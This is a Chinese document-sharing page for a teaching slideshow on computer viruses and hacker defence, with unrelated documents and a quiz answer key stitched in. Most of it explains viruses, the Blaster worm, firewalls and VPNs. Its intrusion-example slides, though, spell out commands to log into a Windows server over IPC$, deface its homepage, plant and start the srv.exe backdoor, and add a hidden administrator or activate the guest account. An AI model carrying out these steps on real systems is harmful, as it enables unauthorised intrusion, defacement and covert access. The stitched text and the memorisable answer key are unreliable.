当前位置:文档之家 › 第9章、计算机病毒与黑客防范

第9章、计算机病毒与黑客防范

  • 格式:ppt
  • 大小:319.00 KB
  • 文档页数:23

下载文档原格式

  / 23

合集下载

计算机病毒和计算机黑客

计算机病毒和计算机黑客

计算机病毒和计算机黑客在当今数字化的时代,计算机已经成为我们生活和工作中不可或缺的一部分。

然而,伴随着计算机技术的飞速发展,计算机病毒和计算机黑客这两个“数字恶魔”也给我们带来了巨大的威胁和困扰。

计算机病毒,就像是隐藏在计算机世界里的“病魔”,它具有隐蔽性、传染性和破坏性等特点。

它可以悄无声息地潜入我们的计算机系统,然后在合适的时机爆发,给我们带来各种各样的麻烦。

计算机病毒的产生,有的是出于一些不法分子的恶意,为了获取非法利益或者满足自己的破坏欲望。

有的则是一些技术爱好者的无意之举,他们在探索计算机技术的过程中,不小心制造出了具有破坏力的程序。

这些病毒一旦进入我们的计算机,就会开始它的破坏之旅。

它们可能会篡改我们的文件,导致重要数据丢失或者损坏。

也可能会占用大量的系统资源,让计算机变得异常缓慢,甚至死机。

还有一些病毒会窃取我们的个人信息,如账号密码、银行卡信息等,给我们的财产安全带来严重威胁。

比如,曾经肆虐一时的“熊猫烧香”病毒,它会让用户的电脑出现蓝屏、频繁重启以及系统硬盘中的数据文件被破坏等问题,给无数用户造成了巨大的损失。

还有“勒索病毒”,它会加密用户的重要文件,然后向用户勒索赎金,否则就不恢复文件。

与计算机病毒相比,计算机黑客则更像是一群“数字强盗”。

他们凭借着高超的计算机技术,突破计算机系统的防护,获取未经授权的访问权限。

计算机黑客的行为动机也是多种多样的。

有的是为了展示自己的技术能力,追求所谓的“成就感”。

有的则是为了获取经济利益,通过窃取商业机密、贩卖用户信息等方式谋取暴利。

还有一些黑客是受雇于某些组织或个人,进行有针对性的攻击,以达到破坏竞争对手、获取情报等目的。

黑客的攻击手段也是五花八门。

他们可能会通过网络扫描,寻找计算机系统的漏洞,然后利用这些漏洞入侵系统。

也可能会进行网络监听,窃取用户在网络上传输的敏感信息。

还有的会发起拒绝服务攻击,让目标网站或者服务器瘫痪,无法正常提供服务。

第9章_信息安全与职业道德

第9章_信息安全与职业道德

信息安全涉及的主要问题
• • • • • • 网络攻击与攻击检测、防范问题 安全漏洞与安全对策问题 信息安全保密问题 系统内部安全防范问题 防病毒问题 数据备份与恢复问题、灾难恢复问题
信息安全策略
• • • 先进的信息安全技术是网络安全的根本保证。 严格的安全管理。 制订严格的法律、法规。
个人网络信息安全策略有如下几项: 个人信息定期备份,以防万一而损失有用信息。 谨防病毒攻击,特别是特洛伊木马病毒。 借助ISP或Modem提供的防火墙功能。 关闭“共享”功能,防止别有用心的人通过“共享”功能控 制你的机器。 不厌其烦地安装补丁程序。 使用代理服务器等于在你的机器面前设置了一道屏障,可以 抵御外部对你的机器的直接攻击,从而可以保障机器的安全。
பைடு நூலகம்

9.2.4 身份认证技术
• (1)基于主体特征的认证:磁卡和IC卡 、指 纹、视网膜等识别信息。 • (2)口令机制:一次性口令、加密口令、限 定次数口令。 • (3)基于公钥的认证:安全套接层协议SSL (Secure Socket Layer)、安全电子交易协议 SET(Secure Electronic Transaction)和身份 认证协议(Kerberos)。
网络权限控制目录级1用户名的识别与验证2用户口令的识别与验证3用户账号的缺省限制检查用户对网络资源的访问权限可以用访问控制表来描述922数据加密技术所谓数据加密技术指将一个信息经过加密钥匙及加密函数转换变成无意义的密文而接收方则将此密文经过解密函数解密钥匙还原成明文
第9章 信息安全与职业道德
• • • • 信息安全概述 信息安全技术 计算机病毒及其防治 信息化社会法律意识与道德规范
电脑 病毒 造成 巨大
损失

计算机病毒与反病毒技术 课后习题答案

计算机病毒与反病毒技术 课后习题答案

注:12.19更新第三章第2题、第5题的感染机制答案《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。

计算机病毒(Computer Virus),是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。

计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。

2. 计算机病毒有哪些分类方法?根据每种分类方法,试举出一到两个病毒。

3. 为什么同一个病毒会有多个不同的名称?如何通过病毒的名称识别病毒的类型?国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”,即三元组命名规则。

1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。

2、蠕虫病毒蠕虫病毒的前缀是:Worm。

3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为Hack 。

4、脚本病毒脚本病毒的前缀是:Script。

5、宏病毒其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。

宏病毒的前缀是:Macro。

6、后门病毒后门病毒的前缀是:Backdoor。

7、病毒种植程序病毒后门病毒的前缀是:Dropper。

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。

8.破坏性程序病毒破坏性程序病毒的前缀是:Harm。

这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。

9.玩笑病毒玩笑病毒的前缀是:Joke。

10.捆绑机病毒捆绑机病毒的前缀是:Binder。

4. 简述计算机病毒产生的背景。

5. 计算机病毒有哪些传播途径?传播途径有两种,一种是通过网络传播,一种是通过硬件设备传播(软盘、U盘、光盘、硬盘、存储卡等)。

网络传播,又分为因特网传播和局域网传播两种。

第9章计算机安全课件

第9章计算机安全课件

⑴ 宏病毒的类型 宏病毒是使用某个应用程序自带的宏编程语言,编写的病毒。目前国际上已发现三类宏病毒:感染WORD系统的WORD宏病毒、感染EXCEL系统的EXCEL宏病毒和感染Lotus Ami Pro的宏病毒。 ⑵ 宏病毒有以下特点: ① 感染数据文件;② 多平台交叉感染;③ 容易编写;④ 容易传播。 另外,宏病毒还可以根据触发条件来分类。若依据触发条件,宏病毒大致可分为公用宏病毒和私用宏病毒两类。 宏病毒的防治相对比较容易,目前大多数防病毒软件都能查杀宏病毒。 2)CIH病毒 CIH病毒,使用面向Windows的VxD技术编制,1998年8月从台湾传入国内,有1.2版、1.3版、1.4版三个版本,发作时间分别是4月26日、6月26日和每月的26日。 CIH病毒是第一个直接攻击和破坏计算机硬件系统的病毒,
5. 存储器保护与通信网络安全 1)存储器保护:指对实存储器划分互斥分区,使不同用户有自己的数据存储区域;对虚存储器设定虚存空间的长度来保护程序或数据不受破坏。 2)通信网络安全:指通信网络中的数据加密、网络的端口保护、网络中的主体验证、网络中的数据完整性保护和网络中的通信流分析控制等。 6. 软件与数据库安全 软件与数据库安全涉及信息存储和处理状态下的保护。因此应采取的措施有:设置保护数据完整的安全机构;进行存取控制;实行推断控制等。
3. 计算机实体安全 计算机实体安全是指对场地环境、设施、设备、载体及人员采取的安全对策和措施。具体内容如下: 1)温度与湿度:机房温度在18 ~24 0C、相对湿度40%~60% 。 2)清洁度与采光照明:机房应采用30万级清洁室、粒度0.5m并有足够的照度。 3)防静电、电磁干扰及噪声:机房设备要接地线、磁场强度 800奥斯特、噪声标准应控制在65dB以下。 4)防火、防水及防震:机房应设在二或三楼、考虑防震、要配备灭火器。 5)电源安全与电压稳定:保证供电连续、电压稳定在220V10% 。 4.计算机的正确使用与维护 1)计算机的正常使用,应注意以下事项: ⑴ 严格开关机顺序,开机时应先开外部设备,后开主机;关机顺序则相反。 ⑵ 在计算机运行时,严禁拔插电源或信号电缆,磁盘读写时

防范信息系统恶意攻击(练习+答案)

防范信息系统恶意攻击(练习+答案)

第九章专题二防范信息系统恶意攻击一、单选题1.信息系统的恶意攻击不包括( D )。

A.恶意代码B.口令攻击C.偶然事故D.拒绝服务2.非法访问、破坏、伪造、篡改信息的攻击行为属于(B )。

A.被动攻击B.主动攻击C.漏洞攻击D.黑客攻击3.以下不属于恶意程序的是(D )。

A.木马B.僵尸程序C.蠕虫病毒D.用户自编的程序4.授权用户的合法访问被无条件拒绝的攻击属于( B )。

A.被动攻击B.拒绝服务攻击C.口令攻击D.恶意代码攻击5.信息安全主要技术包括(D )。

①防火墙技术②入侵检测技术③加密技术④灾难备份技术A.①②④B.②③④C.①②③D.①②③④6.信息加密技术不能提供的信息安全服务是( A )。

A.信息鉴别B.保护信息机密性C.保护信息完整性D.保证信息的可用性7.保障信息安全最基本、最核心的技术措施是( B )。

A.反诈骗技术B.信息加密技术C.反病毒技术D.防火墙技术8.以下有关计算机病毒的说法,不正确的是( C )。

A.计算机病毒是人为编制的有害程序B.计算机病毒是一种非授权的可执行程序C.计算机病毒是一种有逻辑错误的小程序D.计算机病毒通过自我复制再传染给其它计算机9.以下不会导致计算机感染病毒的行为是(C )。

A.从网络上下载程序B.接收陌生邮件C.从键盘上输入文字D.运行从网络上下载的程序10.计算机病毒的危害表现在( D )。

A.损伤计算机的硬盘B.使计算机内存芯片损坏C.伤害计算机用户的身体健康D.影响程序的执行,破坏用户数据和程序11.当发现计算机系统受到计算机病毒侵害时,应采取的合理措施是(A )。

A.立即对计算机进行病毒检测、查杀B.立即断开网络,以后不再上网C.重新启动计算机,重装操作系统D.立即删除可能感染病毒的所有文件12.下列预防计算机病毒的措施中,合适的有(B )。

①对重要的数据定期进行备份②安装并及时升级防病毒软件③禁止从网络下载任何文件④不安装来历不明的软件或盗版软件A.①②③B.①②④C.①③④D.②③④13.计算机病毒的主要传播途径有(B )。

第9章信息安全2016

第9章信息安全2016
安全电子交易协议SET(Secure Electronic Transaction)和身份认证 协议(Kerberos)。
*
9.2.5防火墙技术
1、防火墙的功能:
最常见的保证网 络安全的工具
专门用于保护网络内部安全的系统(用户、数据和资源的安全)。 从某种意义上说,防火墙是一种访问控制产品,可以是一台专属的硬 件,也可以是架设在一般硬件上的一套软件或一个软件。 一般来说,企业选用硬件防火墙,而个人用户则采用软件防火墙。
危害系统文件
* (2)文件型病毒:附属在可执行文件内的病毒,如DIR2、CIH病毒。 * (3)混合型病毒:集引导型和文件型病毒特性于一体,如New
century病毒。
毒。
* (4)宏病毒:利用Word和Excel宏作为载体的病毒,如七月杀手病 * (5)网络病毒:利用网络的通信功能,将自身从一个结点发送到
* 信息安全
* 9.1 信息安全概述 * 9.2 信息安全技术 * 9.3 计算机病毒及黑客的防范 * 9.4 信息化社会法律意识与道德规范
*9.1 信息安全概述
*信息安全(Information
Security)通常是指信息在采集、 传递、存储和应用等过程中的完整性、机密性、可用性、 可控性和不可否认性。
加 密 技 术 分 类
对称加密算法:使用相同的密钥加密和解密的算法 (如DES算 法)
例如:将每一个字母加5, 即a加密成f,b加密成g.这种算法的密钥就 是5,此加密算法使用的是对称加密技术
非对称加密算法:使用不同的密钥加密和解密的算法 (如RSA 密码体制)
* 9.2.3数字签名和数字证书技术
法律、历史、文化和道德等诸多方面。
*信息安全不单纯是技术问题,它涉及技术、管理、制度、

《网络空间安全导论》第9章 计算机病毒与恶意软件


9.4 恶意软件
恶意软件俗称流氓软件,是对破坏系统正常运行的软件的统称。恶意 软件介于病毒软件和正规软件之间,同时具备正常功能(下载、媒体 播放等)和恶意行为(弹广告、开后门),给用户带来实质危害。 目前,互联网上有许多恶意软件猪、划词搜索等 。
9.1 计算机病毒概述
9.1.1 计算机病毒简介 计算机病毒(Computer Virus)是攻击者编写的破坏计算 机功能或者数据的代码,能影响计算机的使用,能自我复 制的一组计算机指令或者程序代码。 计算机病毒是一段程序,一段可执行的代码。就像生物病 毒一样,具有自我繁殖、互相传染以及激活再生等生物病 毒特征。计算机病毒有独特的复制能力,它们能够快速蔓 延,又常常难以根除。它们能把自身附着在各种类型的文 件上,当文件被复制或从一个用户传送到另一个用户时, 它们就随同文件一起蔓延开来。
9.4 恶意软件
9.4.1 恶意软件的概述 在中国对于恶意软件定义最权威的要属于中国互联网协会反恶意软件 协调工作组对恶意软件的定义。2006 年,中国互联网协会反恶意软件 协调工作组在充分听取成员单位意见的基础上,最终确定了“恶意软 件”定义并向社会公布: 恶意软件俗称“流氓软件”,是指在未明确提示用户或未经用户许可 的情况下,在用户计算机或其他终端上安装运行,侵害用户合法权益 的软件,但不包含我国法律法规规定的计算机病毒。
9.2 典型的计算机病毒分析
9.2.3 “梅利莎(Melissa)”病毒 “梅丽莎”病毒,是1998年春天,由美国人大卫·L·史密斯运用Word 的宏运算编写出的一个电脑病毒,其主要是通过邮件传播。邮件的标 题通常为“这是给你的资料,不要让任何人看见”。
9.2 典型的计算机病毒分析
9.2.4 “爱虫(I love you)” 病毒 爱虫病毒(Vbs.loveletter),又称“我爱你”(I Love You)病毒,是一种 蠕虫病毒,它与1999年的梅丽莎病毒非常相似。这个病毒可以改写本 地及网络硬盘上面的某些文件,如.VBS、.HTA、.JPG、.MP3等十二 种数据文件。用户机器染毒以后,邮件系统将会变慢,并可能导致整 个网络系统崩溃,在全球更是造成了百亿美元的损失。

信息技术PPT 第9章 计算机安全

入侵型病毒—这种病毒是将病毒程序的一部分插入 到合法的主程序中,破坏原程序。
源码型病毒—这种病毒是在源程序被编译前,将病 毒程序插入到高级语言编写的源程序中,经过编译 后,成为可执行程序的合法部分,危害较大。
计算机病毒的传播途径
通过软盘、光盘、移动存储器等传染 通过机器传播 通过网络传播
卡巴斯基(kaspersky)、诺顿(Norton)、迈克 菲 (McAfee)、瑞星、江民(KV3000)、金山毒霸
杀毒软件的更新(升级)
为保证杀毒软件对新出现的病毒能够识别并进 行查杀,杀毒软件需要定期进行病毒库的更 新—即常说的升级。
计算机黑客
“黑客”最早源自英文“hacker”,原指热心于 计算机技术,水平高超的电脑专家,尤其是程 序设计人员。早期在美国的电脑界是带有褒义 的。但到了今天,黑客一词已被用于泛指那些 专门利用网络进行非法入侵、破坏或恶作剧的 人。
计算机病毒的防治
1. 尽量避免使用来历不明的磁盘 2. 尽量使用硬盘启动系统 3. 对不需写入数据的磁盘进行写保护 4. 养成良好的数据备份习惯 5. 慎用网上下载软件 6. 严格管理制度 7. 定期检查 8. 安装杀毒软件
杀毒软件
定义: 杀毒软件是一种专门用来查杀病毒的程序,
也称“反病毒软件(Anti-virus Software)”或“安全 防护软件(Safe-defend Software)”。它的主要作用 就是查杀病毒,还可以主动监控、防御病毒。 常用杀毒软件:
计算机的安全操作(软件安全)
计算机病毒 计算机黑客
计算机病毒
计算机病毒,是指编制或者在计算机程序中插 入的破坏计算机功能或者毁坏数据,影响计算 机使用,并能自我复制的一组计算机指令或者 程序代码。

计算机安全基础

第9章计算机信息安全
随着计算机应用范围越来越广泛,尤其Internet应用的普及,各行各业对计算机网络的依赖程度也越来越高,这种高度依赖将使社会变得十分“脆弱”,一旦网络受到攻击,轻者不能正常工作,重者危机国家安全。
本章介绍计算机信息系统安全的基本知识,讲解提高Windows系统安全性的方法,以及瑞星杀毒软件、木马克星、天网防火墙的使用。
非授权访问
冒充合法用户
破坏数据的完整性
干扰系统正常运行
病毒与恶意攻击及线路窃听
9.1.3信息安全保障措施
物理安全
网络安全
数据备份
病毒防护
系统安全
事故处理、紧急响应
复查审计
设立信息安全监控制度
9.2计算机病毒及防治
9.2.1什么是计算机病毒
计算机病毒(Computer Viruses)是一种人为的特制小程序,它具有自我复制能力,能通过非授权入侵而隐藏在可执行程序和数据文件中,从而影响并破坏正常程序的执行和数据安全,通常具有相当大的破坏性。
9.1.1信息安全的定义
信息(Information)是通过在数据上施加某些约定而赋予这些数据的特殊含义
计算机信息安全是指计算机信息系统的硬件、软件、网络及系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统能连续、可靠、正常地运行,信息服务不中断
保密性(Confidentiality)
8.制定物理安全措施
9.3.4网络黑客
今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙,
1.常用黑客手段
(1)获取口令
(2)电子邮件攻击
(3)放置特洛伊木马程序
(4)诱入法
(5)WWW的欺骗技术
(6)寻找系统漏洞

信息安全基础知识概述(PPT 39张)


可视化、 易操作、易管理 平台
高性能架构,面 对应用层威胁 应用识别与精细 控制
多模块联动, 一体化引擎 云、大数据分 析外部联动
第9章 信息安全基础知识9章 信息安全基础 知识
37
本章总结
计算机技术与网络技术的迅猛发展,信 息社会,大大提高了工作、学习效率, 丰富了我们的生活。
计算机安全问题成为亟待解决的问题。
计算机安全对于国家安全、经济发展、 社会稳定和人们的日常生活有着极为重 要的意义。
当代大学生要学习和掌握一定的信息安 全与管理知识,这样才能够在互联网上 有效的防止侵害,保卫自己的信息安全。
第9章 信息安全基础知识9章 信息安全基础 知识 38
本章结束,谢谢!
使用设备测量用户的生物特征并和用户档案进行对比。。
视网膜扫描 声纹识别 面部识别
使用光学设备发出的低强度光源扫描视网 膜上独特的图案,视网膜扫描是十分精确的。
是根据说话人的发音生理和行为特征,识别说 话人身份的一种生物识别方法。 计算机系统利用摄像机获取识别对象的面部图 像后与数据库图像进行比对,完成识别过程。
第9章 信息安全基础知识9章 信息安全基础 知识 32
1.防火墙的基本准则
一切未被允许的就是 禁止的 一切未被禁止的就是 允许的
第9章 信息安全基础知识9章 信息安全基础 知识
33
2.防火墙的基本功能
第9章 信息安全基础知识9章 信息安全基础 知识
34
3.防火墙的关键技术
代理服务 技术 状态监控技 术 包过滤技术
危害
正常的程序无法运行,计算机内的
第9章 信息安全基础知识9章 信息安全基础 文件被删除或受损。计算机引导扇区 知识 20
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
3、瑞星防火墙设置举例: 下载瑞星防火墙软件演示:
4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。
9.20 VPN虚拟专用网
服务,操作步骤如下:
上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录
Copy c:\srv.exe \\IP地址\admin$
9.11 网络入侵实例解析
获取进程,键入如下命令: Net time \\IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe ,键入 At \\ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:\winnt\system32\目录下,这是黑客入侵的全过程
9.3 计算机病毒的防范
1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒
3、使用瑞星杀毒软件清除病毒。
4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: ①病毒名称:Worm.Blaser 发作时间:随机
9.5、清除冲击波病毒实例
3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: /downloads/details.aspx?familyI D=c8b8a846-f541-4c15-8c9f22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01
9.6、黑客入侵解析
黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。
黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。
9.7、 黑客入侵解析
4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FTP和GUEST帐户。
9.8、网络入侵实例解析
1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示:
扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use \\IP地址\IPC$ “密码“ /user: “用户名”
9.10、网络入侵实例解析
连接成功后,可以更换对方Web主页,键入如下: Copy c:\index.htm \\IP地址\C$\inetpub\wwwroot 其中C$\inetpub\wwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet
9.13 网络入侵的常用命令
Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。 AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time \\127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1,
⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 ⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性
9.22 网络安全体系结构
认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 ①User/Password 认证:常用于操作系统登录\telnet ,此认证方式不加 密,容易被监听和解密。 ②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议) SNMP Security protocol等均使用共享的Security Key,加上摘要算法. ③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。 应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁 重的证书管理任务。 ④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发 送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计 算机能力上讲是不可行的。
9.17 黑客防范技术
1、通常使用的安全控制手段有 ①包过滤、 ②状态检测 ③代理服务。 代理服务是运行于内部网络和外部网络之间的主机
之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。
计算机维护技术
第9章、计算机病毒与黑客防范
9.1 计算机病毒解析
1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。
2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。
这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒
9.2 计算机病毒
4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 ①内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DOS操作系统管不了,病毒修改内存空间大 小标记单位[0413]单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 ②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 ③文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 ④启动程序被修改。
1、VPN虚拟专用网组建 2、VPN示意图
பைடு நூலகம்
9.21 网络安全体系结构
网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段:
①防病毒软件
②防火墙 ③入侵检测
④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。
9.14 网络入侵的常用命令
启动一个程序,键入at \\127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp 将本机c:\index.htm 文件传送到对方d:\下 Put c:\index.htm d:\ 将对方d:\index.htm 文件传送到本机c:\下 Get d:\index.htm c:\
9.12、网络入侵的常用命令
Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use \\127.0.0.1\ipc$ “123456” /user: “abc” 退出 Net use \\127.0.0.1\ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。
如何探测电子邮件:电子邮件系统一般建立在网络服
务器上,如电子邮件地址xxx@表示该电 子邮件存储在网站上,其域名为 探测
①打开软件-----选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”
②病毒类型:蠕虫病毒
传播途径:网络/RPC漏洞
病毒尺寸:6176字节
③依赖系统:Windows2000/XP
④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有
9.4、清除冲击波病毒实例
漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找msblast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。
9.18 黑客防范技术
2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。